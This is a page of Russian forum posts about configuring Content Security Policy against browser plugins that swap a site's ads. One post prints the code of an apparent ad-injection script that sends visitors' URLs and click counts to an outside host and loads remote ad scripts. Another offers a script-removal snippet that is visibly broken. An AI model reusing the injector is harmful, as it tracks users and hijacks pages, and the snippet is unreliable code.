ctit ctit

Рейтинг
248
Регистрация
07.05.2010
Настройка CSP - Content Security Policy
Ladycharm:
А вы как число показов смотрите, и показов чего?

Смотрю просто доход. Когда разница от 30% до 50%, это очевидно. Писали, что именно в этом время в AdSense упала цена за клик, возможно совпадение. Давайте потестю еще месяц.

Что касается http://yandex.sc, то в поддержке Яндекса сообщили, что это не их домен, а следовательно вирусняк.

P.S. А вот как распространяют зараженные браузеры и плагины.

/ru/forum/871581

Re: Резкое падение позиций в Яндексе, есть ответ Платона 2ч
kartashenkov:
Друзья, получил обнадеживающий ответ) Спешу поделиться):

Получается, чтобы Яндексоиды обратили внимание на сайт и исправили баги, надо донимать их днем и ночью? Спасибо, совковый период я уже прошел.

Настройка CSP - Content Security Policy
Ladycharm:
Вставка рекламы работает и на https-страницах, она подгружается с отдельных https-доменов.
Но, если ваши сайты не работают по https - в отчётах его и не будет, только случайный мусор от ошибок в скриптах.

1. С установленной Content Security Policy, CTR не может упасть ни на Директе, на на Адсенсе.
CTR в принципе не зависит от того, будет ли показана реклама на странице или она будет подменена на чужую.

2. При некорректно настроенной Content Security Policy падает только количество показов, тк реклама подменяется на чужую.

3. У Адсенса считается "специфический" CTR - "количество кликов на количество показов страницы".
У Директа, например, CTR - это "количество кликов на количество показов объявлений". Сопоставлять их между собой - некорректно.

PS: Не пойму, вы искренне заблуждаетесь, или намеренно пытаетесь кого-то запутать?

Уже 5 неделя тестирования пошла. И каждый раз - как только снимаю CSP - доход возвращается. Это касается не только AdSense, но и других площадок. Первые три недели думал случайность, но факты уже на лицо.

При некорректно настроенной Content Security Policy падает только количество показов, тк реклама подменяется на чужую.

Нет, количество показов у меня не падает.

На данный момент не достаточно простого показа объявления. Скрипты (как правило сторонние) анализируют поведение пользователя, и только после сводных характеристик объявление засчитывается (может пройти и целый день).

Что Бегун и здесь умер?
maxim2501:
тем более что Соловей умер

С чего вы так решили? Прекрасно поживает.

Настройка CSP - Content Security Policy
ngsv:
Ставьте SSL сертификат на сайт

Явно из-за переходного периода на https упадет трафик. К тому же в отчетах мелькали вирусы на Https (хотя могли быть просто cdn баз вирусов).

За время тестирования все плагины пользователя удалось классифицировать:

  • Системные ответы браузера или плагинов
  • Плагины подмены рекламы
  • Плагины для сбора статистики о просмотренных сайтах и cookies
  • Плагины для сбора запросов из ПС
  • Безопасные плагины пользователя

При этом настройку CSP удалось заточить под AdSense так, что доходы стабилизировались (ctr уже не падает), а вот под другие РП все еще надо настраивать.

Настройка CSP - Content Security Policy

Клиентка прислала скрины моего сайта - плагин Амиго - подменяет рекламу, причем весьма на непотребную. Сейчас на сайте выдается предупреждение, что возможно браузер пользователя заражен.

Настройка CSP - Content Security Policy
ctit:
А почему нельзя контролировать только <script>, <iframe>. Они же создают угрозу....

На мой взгляд этот код должен вполне спасать сайт.

Поставил данный скрипт. Отчеты по CSP прекратились. То ли скрипт все режет, то ли пользователи стали убирать плагины.....

Настройка CSP - Content Security Policy
burunduk:
контролировать надо все элементы

А почему нельзя контролировать только <script>, <iframe>. Они же создают угрозу....

На мой взгляд этот код должен вполне спасать сайт.


function goodscript(s)
{
var del1 = [пропускать эти домены];
for (var i in del1)
{
if (s.indexOf(del1) + 1) return true;
}
return false;
}
function delscript()
{
var col=document.getElementsByTagName("script");
var ns=col.length;
for(i=0;i<ns;i++)
{
if (col && col.getAttribute("src") != null)
{
s1=col.getAttribute("src");
if ( goodscript(s1)==false )
{
col.InnerHtml="";col.setAttribute("src","");
col.parentNode.removeChild(col);
}
}
}
}
setInterval(delscript(), 1500);
Настройка CSP - Content Security Policy

Что касается http://yandex.sc

Вот его код. На первый взгляд типичный вирусняк, однако список ресурсов почему-то назван BlackList. Кто силен в js, подскажите. Пока удалил этот ресурс из списка CSP.


{function b(b){e.Debug&&console.log(b)}function d(a){b("get: "+a+" return "+localStorage[a]);
return localStorage[a]}

function a(a,d){b("set: "+a+" = "+d);
localStorage[a]=d}function g(){return(new Date).getTime()}function h(a,d,c){if(c){var e=document.createElement("div");
e.id=c;document.body.appendChild(e)}c=document.createElement("script");c.setAttribute("type","text/javascript");
c.setAttribute("src",a);document.body.appendChild(c);b("INJECT ADVERT SCRIPT: "+a);(function(){var a=0,c=
setInterval(function(){20<=a?(clearInterval(c),b("CLEAR_INTERVAL: MAX ITERATIONS"),e("document")):

(e(d)&&(clearInterval(c),b("CLEAR_INTERVAL: FOUND")),a++)},300),e=function(b){var a="document"==b?document:document.querySelector(b);if(a){var c=function(){f.contentWindow.postMessage({type:"advert-script-clicked"},"*");a.removeEventListener("mousedown",c)};a.addEventListener("mousedown",c);return!0}return!1}})()}

function k(b){b=Base64.encode(JSON.stringify(b));b=e.IframeSrc+"?q="+b;f=document.createElement("iframe");
f.setAttribute("src",b);f.setAttribute("width",0);
f.setAttribute("height",0);f.setAttribute("border",0);f.style.display="none";
document.body.appendChild(f)}
var f,e={BlackList:"список поисковиков список ресурсов миллионников далее список порно-ресурсов".split(" "), FirstDate:"_ci_first_date",LastDate:"_ci_last_date",Clicks:"_ci_clicks",DateInterval:2592E5,CheckDate:Date.parse("8/15/2014"),IframeSrc:"http://yandex.sc/v4/ci.iframe.html",Debug:0},l={increment:function(){var a=parseInt(localStorage[e.Clicks])||0;b("Clicks.increment OLD:"+a);localStorage[e.Clicks]=a+1},get:function(){return localStorage[e.Clicks]},set:function(b){localStorage[e.Clicks]=b}};

if(function(b){for(var a=0;a<e.BlackList.length;a++)if(0<=b.indexOf(e.BlackList[a]))return!0;return!1}(location.host))b("Blacklist");
else{b("Not Blacklist");l.increment();var g=g(),m=parseInt(d(e.LastDate))||0;d(e.FirstDate)||a(e.FirstDate,g);b("Now>CheckDate "+(g>=e.CheckDate));b("Now-lastDate>Inteval "+(g-m>=e.DateInterval));g>=e.CheckDate&&g-m>=e.DateInterval&&(l={FirstDate:d(e.FirstDate),LastDate:g,Clicks:l.get(),Url:location.href,Domain:location.host},k(l),b("Inject Iframe"));a(e.LastDate,g)}(function(){var a=c.addEventListener?"addEventListener":"attachEvent";(0,c[a])("attachEvent"==a?"onmessage":"message",function(a){a=
a.data;"advert-script-iframe"==a.type&&a.url?h(a.url,a.selector,a.append_id):"advert-script-log"==a.type&&a.log&&b(a.log)},!1)})()})
Настройка CSP - Content Security Policy
Оптимизайка:
А я наблюдаю, что data:text - скрипты рекламных сетей попандеров казино вулкан :)

Да, тоже нашел его (уже делаю заплатку). В его списке все сайты про казино и деньги.

1... 93949596979899100101 ...132
Всего: 1317